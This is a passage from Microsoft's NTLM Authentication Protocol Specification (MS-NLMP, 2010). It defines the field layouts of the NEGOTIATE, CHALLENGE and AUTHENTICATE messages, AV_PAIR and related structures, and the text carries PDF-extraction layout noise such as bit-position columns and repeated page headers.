18 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  DomainNameLen (2 bytes):  A 16-bit unsigned integer that defines the size, in bytes, of 
DomainName  in Payload . 
DomainNameMaxLen (2 bytes):  A 16-bit unsigned integer that SHOULD be set to the 
value of DomainNameLen  and MUST be ignored on receipt.  
DomainNameBufferOffset (4 bytes):  A 32-bit unsigned integer that defines the offset, 
in bytes, from the beginning of the NEGOTIATE_MESSAGE to Domain Name  in 
Payload . 
WorkstationFields (8 bytes):  If the NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED 
flag is not set in NegotiateFlags , indicating that no WorkstationName  is supplied in 
Payload : 
WorkstationLen  and WorkstationMaxLen  fields SHOULD be set to zero . 
WorkstationBufferOffset  field SHOULD be set to the offset from the beginning of the 
NEGOTIATE_MESSAGE to where the WorkstationName  would be in Payload  if it was 
present.  
WorkstationLen , WorkstationMaxLen , and WorkstationBufferOffset  MUST be 
ignored on re ceipt.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
WorkstationLen  WorkstationMaxLen  
WorkstationBufferOffset  
WorkstationLen (2 bytes):  A 16-bit unsigned integer that defines the size, in bytes, of 
WorkStationName  in Payload . 
WorkstationMaxLen (2 bytes):  A 16-bit unsigned integer that SHOULD be set to the 
value of WorkstationLen  and MUST be ignored on receipt.  
WorkstationBufferOffset (4 bytes):  A 32-bit unsigned integer that defines the offset, in 
bytes, from the beginning of the NEGOTIATE_MESSAGE to WorkstationName  in 
Payload . 
Version (8 bytes):  A VERSION  structure (as defined in section 2.2.2.10 ) that is present only 
when the NTLMSSP_NEGOTIATE_VERSION flag is set in the NegotiateFlags  field. This 
structure is used for debugging purposes only. In normal (non -debugging) protocol messages, 
it is ignored and does not affect the NTLM message processing .<5> 
Payload (variable):  A byte -array that contains the data referred to by the 
DomainNameBufferOffset  and WorkstationBufferOffset  message fields. Payload  data 
can be present in any order within the Payload  field, with variable -length  padding before or 
after the data. The data that can be present in the Payload  field of this message, in no 
particular order, are:  
 
19 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010   
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
DomainName (variable)  
... 
WorkstationName (variable)  
... 
DomainName (variable):  If DomainNameLen  does not equal 0x0000, DomainName  
MUST be a byte -array that contains the name of the client authentication domain that 
MUST be encoded using the OEM character set . Otherwise, this data is not present. <6> 
WorkstationName (variable):  If WorkstationLen  does not equal 0x0000, 
WorkstationName  MUST be a byte array that contains the name of the client machine 
that MUST be encoded using the OEM charac ter set. Otherwise, this data is not present.  
2.2.1.2   CHALLENGE_MESSAGE  
The CHALLENGE_MESSAGE defines an NTLM challenge  message that is sent from the server to the 
client. The CHALLENGE_MESSAGE is used by the server to challenge the client to prove its identity. 
For connection -oriented requests, the CHALLENGE_MESSAGE generated by the server is in response 
to the NEGOTIATE_MESSAGE (section 2.2.1.1 ) from the client.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
Signature  
... 
MessageType  
TargetNameFields  
... 
NegotiateFlags  
ServerChallenge  
... 
 
20 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Reserved  
... 
TargetInfoFields  
... 
Version  
... 
Payload (variable)  
... 
Signature (8 bytes):  An 8-byte character array that MUST contain the ASCII string ('N', 'T', 'L', 
'M', 'S', 'S', 'P', ' \0'). 
MessageType (4 bytes):  A 32-bit unsigned integer that indicates the message type. This field 
MUST be set to 0x00000002.  
TargetNameFields (8 bytes):  If the NTLMSSP_REQUEST_TARGET flag is not set in 
NegotiateFlags , indicating that no TargetName  is required:  
TargetNameLen  and TargetNameMaxLen  SHOULD be set to zero on transmission.  
TargetNameBufferOffset  field SHOULD be set to the offset from the beginning of the 
CHALLENGE_MESSAGE to where the TargetName  would be in Payload  if it were present.  
TargetNameLen , TargetNameMaxLen , and TargetNameBufferOffset  MUST be 
ignored on receipt.  
Otherwise, these fields are defined as:  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
TargetNameLen  TargetNameMaxLen  
TargetNameBufferOffset  
TargetNameLen (2 bytes):  A 16-bit unsigned integer that defines the size, in bytes, of 
TargetName  in Payload . 
TargetNameMaxLen (2 bytes):  A 16-bit unsigned integer that SHOULD be set to the 
value of TargetNameLen  and MUST be ignored on receipt.  
 
21 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  TargetNameBufferOffset (4 bytes):  A 32-bit unsigned integer that defines the offset, in 
bytes, from the beginning of th e CHALLENGE_MESSAGE to TargetName  in Payload . If 
TargetName  is a Unicode string, the values of TargetNameBufferOffset  and 
TargetNameLen  MUST be multiples of 2.  
NegotiateFlags (4 bytes):  A NEGOTIATE  struct ure that contains a set of bit flags, as defined 
by section 2.2.2.5 . The server sets flags to indicate options it supports or, if there has been a 
NEGOTIATE_MESSAGE  (section 2.2.1.1), the choices it has m ade from the options offered by 
the client.  
ServerChallenge (8 bytes):  A 64-bit value that contains the NTLM challenge. The challenge is 
a 64-bit nonce. The processing of the ServerChallenge is specified in sections 3.1.5 and 3.2.5. 
Reserved (8 bytes):  An 8-byte array whose elements MUST be zero when sent and MUST be 
ignored on receipt.  
TargetInfoFields (8 bytes):  If the NTLMSSP_NEGOTIATE_TARGET_INFO fl ag of 
NegotiateFlags  is clear, indicating that no TargetInfo  is required:  
TargetInfoLen , TargetInfoMaxLen , and TargetInfoBufferOffset  SHOULD be set to 
zero on transmission.  
TargetInfoBufferOffset  field SHOULD be set to the offset from the beginning of the 
CHALLENGE_MESSAGE to where the TargetInfo  would be in Payload  if it were present.  
TargetInfoLen , TargetInfoMaxLen , and TargetInfoBufferOffset  MUST be ignored on 
receipt.  
Otherwise, these fields a re defined as:  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
TargetInfoLen  TargetInfoMaxLen  
TargetInfoBufferOffset  
TargetInfoLen (2 bytes):  A 16-bit unsigned integer that defines the size, in bytes, of 
TargetInfo  in Payload . 
TargetInfoMaxLen (2 bytes):  A 16-bit unsigned integer that SHOULD be set to the 
value of TargetInfoLen  and MUST be ignored on receipt.  
TargetInfoBufferOffset (4 bytes):  A 32-bit unsigned integer that defines the offset, in 
bytes, from the beginning of the CHALLENGE_MESSAGE to TargetInfo  in Payload . 
Version (8 bytes):  A VERSION  structure (as defined in section 2.2.2.10 ) that is present only 
when the NTLMSSP_NEGOTIATE_VERSION flag is set in the NegotiateFlags  field. This 
structure is used for debugging purposes only. In normal (non -debugging) protocol messages, 
it is ignore d and does not affect the NTLM message processing. <7> 
Payload (variable):  A byte array that contains the data referred to by the 
TargetNameBufferOffset  and TargetInfoBufferOffset  message fields. Payload data can be 
present in any orde r within the Payload  field, with variable -length padding before or after the 
 
22 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  data. The data that can be present in the Payload  field of this message, in no particular 
order, are:  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
TargetName (variable)  
... 
TargetInfo (variable)  
... 
TargetName (variable):  If TargetNameLen  does not equal 0x0000, TargetName  
MUST be a byte array that contains the name of the server authentication realm, and 
MUST be expressed in the negotiated character set. A server that is a member of a 
domain returns the domain of which it is a member, and a server that is not a member 
of a domain returns the server name.  
TargetInfo (variable):  If TargetInfoLen  does not equal 0x0000, TargetInfo  MUST be 
a byte array that contains a sequence of AV_PAIR structures. The AV_PAIR structure is 
defined in section 2.2.2.1 . The length of each AV_PAIR is determined by its AvLen  field 
(plus 4 bytes).  
Note   An AV_PAIR structure can start on any byte alignment and the sequence of 
AV_PAIRs has no padding between structures.  
The sequence MUST be terminate d by an AV_PAIR structure with an AvId  field of 
MsvAvEOL. The total length of the TargetInfo  byte array is the sum of the lengths, in 
bytes, of the AV_PAIR structures it contains.  
Note   If a TargetInfo  AV_PAIR Value is textual, it MUST be encoded in Unicod e 
irrespective of what character set was negotiated (section 2.2.2.1 ).  
2.2.1.3   AUTHENTICATE_MESSAGE  
The AUTHENTICATE_MESSAGE defines an NTLM authenticate message that is sent from the client to 
the server after the CHALLENGE_MESSAGE (section 2.2.1.2 ) is processed by the client.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
Signature  
... 
MessageType  
 
23 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  LmChallengeResponseFields  
... 
NtChallengeResponseFields  
... 
DomainNameFields  
... 
UserNameFields  
... 
WorkstationFields  
... 
EncryptedRandomSessionKeyFields  
... 
NegotiateFlags  
Version  
... 
MIC 
... 
... 
... 
Payload (variable)  
 
24 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  ... 
Signature (8 bytes):  An 8-byte character array that MUST contain the ASCII string ('N', 'T', 'L', 
'M', 'S', 'S', 'P', ' \0'). 
MessageType (4 bytes):  A 32-bit unsigned integer that indicates the message type. This field 
MUST be set to 0x00000003.  
LmChallengeResponseFields (8 bytes):  If the client chooses not to send an 
LmChallengeResponse  to the server:  
LmChallengeResponseLen  and LmChallengeResponseMaxLen  MUST be set to zero on 
transmission.  
LmChallengeResponseBufferOffset  field SHOULD be set to the offset from the 
beginning of the AUTHENTICATE_MESSAGE to where the LmChallengeResponse  would 
be in Payload  if it was present.  
Otherwise, these fields are defined as:  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
LmChallengeResponseLen  LmChallengeResponseMaxLen  
LmChallengeResponseBufferOffset  
LmChallengeResponseLen (2 bytes):  A 16-bit unsigned integer that defines the size, in 
bytes, of LmChallengeResponse  in Payload . 
LmChallengeResponseMaxLen (2 bytes):  A 16-bit unsigned integer that SHOULD be 
set to the value of LmChallengeResponseLen  and MUST be ignored on receipt.  
LmChallengeResponseBufferOffset (4 bytes):  A 32-bit unsigned integer that defines 
the offset, in byte s, from the beginning of the AUTHENTICATE_MESSAGE to 
LmChallengeResponse  in Payload . 
NtChallengeResponseFields (8 bytes):  If the client chooses not to send an 
NtChallengeResponse  to the server:  
NtChallengeResponseLen , and NtChallengeResponseMaxLen  MUST be  set to zero on 
transmission.  
NtChallengeResponseBufferOffset  field SHOULD be set to the offset from the beginning 
of the AUTHENTICATE_MESSAGE to where the NtChallengeResponse  would be in 
Payload  if it was present.  
Otherwise, these fields are defined as:  
 
25 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010   
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
NtChallengeResponseLen  NtChallengeResponseMaxLen  
NtChallengeResponseBufferOffset  
NtChallengeResponseLen (2 bytes):  A 16-bit unsigned integer that defines the size, in 
bytes, of NtChallengeResponse  in Payload . 
NtChallengeResponseMaxLen (2 bytes):  A 16-bit unsigned integer that SHOULD be set 
to the value of NtChallengeResponseLen  and MUST be ignored on receipt.  
NtChalle ngeResponseBufferOffset (4 bytes):  A 32-bit unsigned integer that defines 
the offset, in bytes, from the beginning of the AUTHENTICATE_MESSAGE to 
NtChallengeResponse  in Payload .<8> 
DomainNameFields (8 bytes):  If the client chooses no t to send a DomainName  to the 
server:  
DomainNameLen  and DomainNameMaxLen  MUST be set to zero on transmission.  
DomainNameBufferOffset  field SHOULD be set to the offset from the beginning of the 
AUTHENTICATE_MESSAGE to where the DomainName  would be in Paylo ad if it was 
present.  
Otherwise, these fields are defined as:  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
DomainNameLen  DomainNameMaxLen  
DomainNameBufferOffset  
DomainNameLen (2 bytes):  A 16-bit unsigned integer that defines the size, in bytes, of 
DomainName  in Payload , not including a NULL terminator.  
DomainNameMaxLen (2 bytes):  A 16-bit unsigned integer that SHOULD be set to the 
value of DomainNameLen  and MUST be ignored on receipt.  
DomainNameBufferOffset (4 bytes):  A 32-bit unsigned integer that defines the offset, 
in bytes, from the beginning of the AUTHENTICATE_MESSAGE to DomainName  in 
Payload . If DomainName  is a Unicode string, the values of 
DomainNameBufferOffset  and DomainNameLen  MUST be multiples of 2.  
UserNameFields (8 bytes):  If the client chooses not to send a UserName  to the server:  
UserNameLen  and UserNameMaxLen  MUST be set to zero on transmission.  
UserNameBufferOffset  field SHOULD be set to the offset from the beginning of the 
AUTHENTICATE_MESSAGE to where the UserName  would be in Payload  if it was present.  
 
26 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Otherwise, these fields are defined as:  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
UserNameLen  UserNameMaxLen  
UserNameBufferOffset  
UserNameLen (2 bytes):  A 16-bit unsigned integer that defines the size, in bytes, of 
UserName  in Payload , not including a NULL terminator.  
UserNameMaxLen (2 bytes):  A 16-bit unsigned integer that SHOULD be set to the value 
of UserNameLen  and MUST be ignored on receipt.  
UserNameBufferOffset (4 bytes):  A 32-bit unsigned integer that defines the offset, in 
bytes, from the beginning of the AUTHENTICATE_MESSAGE to UserNam e in Payload . 
If UserName  to be sent contains a Unicode string, the values of 
UserNameBufferOffset  and UserNameLen  MUST be multiples of 2.  
WorkstationFields (8 bytes):  If the client chooses not to send Workstation  to the server:  
WorkstationLen  and WorkstationMaxLen  MUST be set to zero on transmission.  
WorkstationBufferOffset  field SHOULD be set to the offset from the beginning of the 
AUTHENTICATE_MESSAGE to where the Workstation  would be in Payload  if it was 
present.  
Otherwise, these fields are defi ned as:  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
WorkstationLen  WorkstationMaxLen  
WorkstationBufferOffset  
WorkstationLen (2 bytes):  A 16-bit unsigned integer that defines the size, in bytes, of 
Workstation  in Payload , not including a NULL terminator.  
WorkstationMaxLen (2 bytes):  A 16-bit unsigned integer that SHOULD be set to the 
value of WorkstationLen  and MUST be ignored on receipt.  
WorkstationBufferOffset (4 bytes):  A 32-bit unsigned integer that defines the offset, in 
bytes, from the beginning of the AUTHENTICATE_MESSAGE to Workstation  in 
Payload . If Workstation  contains a Unicode string, the values of 
WorkstationBufferOffset  and WorkstationLen  MUST be multiples of 2 . 
EncryptedRandomSessionKeyFields (8 bytes):  If the NTLMSSP_NEGOTIATE_KEY_EXCH flag 
is not set in NegotiateFlags , indicating that no EncryptedRandomSessionKey  is supplied:  
 
27 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  EncryptedRandomSessionKeyLen  and EncryptedRandomSessionKeyMaxLen  
SHOULD be set to z ero on transmission.  
EncryptedRandomSessionKeyBufferOffset  field SHOULD be set to the offset from the 
beginning of the AUTHENTICATE_MESSAGE to where the EncryptedRandomSessionKey  
would be in Payload  if it was present.  
EncryptedRandomSessionKeyLen , Encrypte dRandomSessionKeyMaxLen  and 
EncryptedRandomSessionKeyBufferOffset  MUST be ignored on receipt.  
Otherwise, these fields are defined as:  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
EncryptedRandomSessionKeyLen  EncryptedRandomSessionKeyMaxLen  
EncryptedRandomSessionKeyBufferOffset  
EncryptedRandomSessionKeyLen (2 bytes):  A 16-bit unsigned integer that defines the 
size, in bytes, of EncryptedRandomSessionKey  in Payload . 
EncryptedRandomSessionKeyMaxLen (2 bytes):  A 16-bit unsigned integer that 
SHOULD be set to the value of EncryptedRandomSessionKeyLen  and MUST be 
ignored on receipt.  
EncryptedRandomSessionKeyBufferOffset (4 bytes):  A 32-bit unsigned integer that 
defines t he offset, in bytes, from the beginning of the AUTHENTICATE_MESSAGE to 
EncryptedRandomSessionKey  in Payload .  
NegotiateFlags (4 bytes):  In connectionless mode, a NEGOTIATE  structure that contains a set 
of bit flags (section 2.2.2.5 ) and represents the conclusion of negotiation —the choices the 
client has made from the options the server offered in the CHALLENGE_MESSAGE. In 
connection -oriented mode, a NEGOTI ATE structure that contains the set of bit flags (section 
2.2.2.5 ) negotiated in the previous messages.  
Version (8 bytes):  A VERSION  structure (section 2.2.2.10 ) that is present only when the 
NTLMSSP_NEGOTIATE_VERSION flag is set in the NegotiateFlags  field. This structure is used 
for debugging purposes only. In normal protocol messages, it is ignored and does not affect 
the NTLM message processing. <9> 
MIC (16 bytes):  The message integrity for the NTLM NEGOTIATE_MESSAGE, 
CHALLENGE_MESSAGE, and AUTHENTICATE_MESSAGE. <10>  
Payload (variable):  A byte array that contain s the data referred to by the 
LmChallengeResponseBufferOffset , NtChallengeResponseBufferOffset , 
DomainNameBufferOffset , UserNameBufferOffset , WorkstationBufferOffset , and 
EncryptedRandomSessionKeyBufferOffset  message fields. Payload data can be present in 
any order within the Payload  field, with variable -length padding before or after the data. The 
data that can be present in the Payload  field of this message, in no particular order, are:  
 
28 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010   
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
LmChallengeResponse (variable)  
... 
NtChallengeResponse (variable)  
... 
DomainName (variable)  
... 
UserName (variable)  
... 
Workstation (variable)  
... 
EncryptedRandomSessionKey (variable)  
... 
LmChallengeResponse (variable):  An LM_RESPONSE  or LMv2_RESPONSE  structure 
that contains the computed LM response to the challenge. If NTLM v2 authentication is 
configured, LmChallengeResponse  MUST be an LMv2_RESPONSE structure (section 
2.2.2.4 ). Otherwise, it MUST be an LM_RESPONSE structure (section 2.2.2.3 ). 
NtChallengeResponse (variable):  An NTLM_RESPONSE  or NTLMv2 _RESPONSE  
structure that contains the computed NT response to the challenge. If NTLM v2 
authentication is configured, NtChallengeResponse  MUST be an NTLMv2_RESPONSE 
(section 2.2.2.8 ). Otherwise, it MUST be  an NTLM_RESPONSE structure (section 
2.2.2.6 ). 
DomainName (variable):  The domain or computer name hosting the user account. 
DomainName  MUST be encoded in the negotiated character set.  
UserName (variable):   The name of the user to be authenticated. UserName  MUST be 
encoded in the negotiated character set.  
Workstation (variable):  The name of the computer to which the user is logged on. 
Workstation  MUST be encoded in the negotiated character set.  
 
29 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  EncryptedRandomSessionKey (variable):  The client's encrypted random session key. 
EncryptedRandomSessionKey  and its usage are defined in sections 3.1.5 and 3.2.5. 
2.2.2   NTLM Structures  
2.2.2.1   AV_PAIR  
The AV_PAIR structure defines an attribute/value pair. Sequences of AV_PAIR structures are used in 
the CHALLENGE_MESSAGE  and AUTHENTICATE_MESSAGE  messages.  
Although the following figure suggests that the most significant bit (MSB) of AvId  is aligned with 
the MSB of a 32 -bit word, an AV_PAIR can be aligned on any byte boundary and can be 4+N bytes 
long for arbitrary N (N = the co ntents of AvLen ). 
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
AvId AvLen  
Value (variable)  
... 
AvId (2 bytes):  A 16-bit unsigned integer that defines the information type in the Value  field. 
The contents of this field MUST be one of the values from the following table. The 
corresponding Value  field in this AV_PAIR MUST contain the information specified in the 
description of that AvId.  
Value  Meaning  
MsvAvEOL  
0 Indicates that this is the last AV_PAIR in the list. AvLen  MUST be 0. 
This type of information MUST be present in the AV pair list.  
MsvAvNbComputerName  
1 The server's NetBIOS computer name. The name MUST be in Unicode, 
and is not null -terminated. This typ e of information MUST be present 
in the AV_pair list.  
MsvAvNbDomainName  
2 The server's NetBIOS domain name . The name MUST be in Unicode, 
and is not null -terminated. This type of information MUST be present 
in the AV_pair list.  
MsvAvDnsComputerName  
3 The fully qualified domain name (FQDN (1))  of the computer. The 
name MUST be in Unicode, and is not null -terminated.  
MsvAvDnsDomainName  
4 The FQDN (2) of the domain. The name MUST be in Unicode, and is 
not null -terminated.  
MsvAvDnsTreeName  
5 The FQDN (2) of the forest . The name MUST be in Unicode, and is not 
null-terminated. <11>  
MsvAvFlags  
6 A 32-bit value indicating server or client configuration.  
0x0000 0001: indicates to the client that the account authentication is 
constrained.  
 
30 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Value  Meaning  
0x00000002: indicates that the client is providing message integrity in 
the MIC field (section 2.2.1.3 ) in the AUTHENTICATE_MES SAGE. <12>  
MsvAvTimestamp  
7 A FILETIME  structure ( [MS-DTYP]  section 2.3.1) in little -endian byte 
order that contains the server local time. <13>  
MsAvRestrictions  
8 A Restriction_Encoding  structure (section 2.2.2.2 ). The Value  field 
contains a structure representing the integrity level of the security 
principal, as well  as a MachineID  created at computer startup to 
identify the calling machine. <14>  
MsvAvTargetName  
9 The SPN of the target server. The name MUST be in Unicode and is not 
null-terminated. <15>  
MsvChannelBindings  
10 A channel bindings hash. The Value field contains an MD5 hash 
([RFC4121]  section 4.1.1.2) of a gss_channel_bindings_struct 
([RFC2744]  section 3.11). An all -zero value of the hash is used to 
indicate absence of channel bindings.  
<16>  
AvLen (2 bytes):  A 16-bit unsigned integer that defines the length, in bytes, of Value . 
Value (variable):  A variable -length byte -array that contains the value defined for this AV pair 
entry. The contents of this field depend on the type expressed in the AvId  field. The available 
types and resulting format and contents of this field are specified in the table within the AvId  
field descript ion in this topic.  
When AV pairs are specified, MsvAvEOL MUST be the last item specified. All other AV pairs, if 
present, can be specified in any order.  
2.2.2.2   Restriction_Encoding  
The Restriction_Encoding structure defines in NTLM allow platform -specific restrictions to be 
encoded within an authentication exchange. The client produces additional restrictions to be applied 
to the server when authorization decisions are to be made. If  the server does not support the 
restrictions, then the client's authorization on the server is unchanged. <17>  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
Size 
Z4 
IntegrityLevel  
SubjectIntegrityLevel  
MachineID  
 
31 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  ... 
... 
... 
... 
... 
... 
... 
Size (4 bytes):  A 32-bit unsigned integer that defines the length, in bytes, of AV_PAIR  Value . 
Z4 (4 bytes):  A 32-bit integer value containing 0x00000000.  
IntegrityLevel (4 bytes):  Indicates an integrity level is present in SubjectIntegrityLevel . 
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 I 
Where the bits are defined as:  
Value  Description  
I If set, indicates that the recipient SHOULD apply the integrity level encoded in the 
following. When clear, no integrity is present.  
SubjectIntegrityLevel (4 bytes):  A 32-bit integer value indicating an integrity level of the 
client. <18>  
MachineID (32 bytes):  A 256 -bit random number created at computer startup to identify the 
calling machine. <19>  
2.2.2.3   LM_RESPONSE  
The LM_RESPONSE structure defines the NTLM v1 authentication LmChallengeResponse  in the 
AUTHENTICATE_MESSAGE . This response is used only when NTLM v1 authentication is configured.  
 
32 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010   
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
Response  
... 
... 
... 
... 
... 
Response (24 bytes):  A 24-byte array of unsigned char that contains the client's 
LmChallengeResponse  as defined in section 3.3.1 . 
2.2.2.4   LMv2_RESPONSE  
The LMv2_RESPONSE structure defines the NTLM v2 authentication LmChallengeResponse  in the 
AUTHENTICATE_MESSAGE . This response is used only when NTLM v2 authentication is configured.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
Response  
... 
... 
... 
ChallengeFromClient  
... 
Response (16 bytes):  A 16-byte array of unsigned char that contains the client's LM 
challenge -response. This is the portion of the LmChallengeResponse  field to which the 
HMAC_MD5 algorithm has been applied, as defined in section 3.3.2. Specifically, Response  
corresponds to the result of applying the HMAC_MD5 algorithm, using the key 
ResponseKeyLM, to a message consisting of the concatenation of the ResponseKeyLM, 
ServerChallenge and  ClientChallenge.  
 
33 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  ChallengeFromClient (8 bytes):  An 8-byte array of unsigned char that contains the client's 
ClientChallenge , as defined in section 3.1.5.1.2 . 
2.2.2.5   NEGOTIATE  
During NTLM authentication, each of the following flags is a possible value of the NegotiateFlags  
field of the NEGOTIATE_MESSAGE , CHALLENGE_MESSAGE , and AUTHENTICATE_MESSAGE , unless 
otherwise noted. These flags define client or server NTLM capabilities supported by the sender.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
W V U r1 r2 r3 T r4 S R r5 Q P r6 O N M r7 L K J r8 H r9 G F E D r10 C B A 
W (1 bit):  If set, requests 56 -bit encryption. If the client sends NTLMSSP_NEGOTIATE_SEAL or 
NTLMSSP_NEGOTIATE_SIGN with NTLMSSP_NEGOTIATE_56 to the server in the 
NEGOTIATE_MESSAGE, the server MUST return NTLMSSP_NEGOTIATE_56 to the client in the 
CHALLENGE_MESSAGE.   Otherwise it is ignored. If both NTLMSSP_NEGOTIATE_56 and 
NTLMSSP_NEGOTIATE_128 are requested and supported by the client and server, 
NTLMSSP_NEGOTIATE_56 and NTLMSSP_NEGOTIATE_128 will both be returned to the client. 
Clients and servers that set NTLMSSP_ NEGOTIATE_SEAL SHOULD set 
NTLMSSP_NEGOTIATE_56 if it is supported. An alternate name for this field is 
NTLMSSP_NEGOTIATE_56 . 
V (1 bit):  If set, requests an explicit key exchange. This capability SHOULD be used because it 
improves security for message inte grity or confidentiality. See sections 3.2.5.1.2 , 3.2.5.2.1 , 
and 3.2.5.2.2  for details. An alternate na me for this field is 
NTLMSSP_NEGOTIATE_KEY_EXCH . 
U (1 bit):  If set, requests 128 -bit session key negotiation. An alternate name for this field is 
NTLMSSP_NEGOTIATE_128. If the client sends NTLMSSP_NEGOTIATE_128 to the server in the 
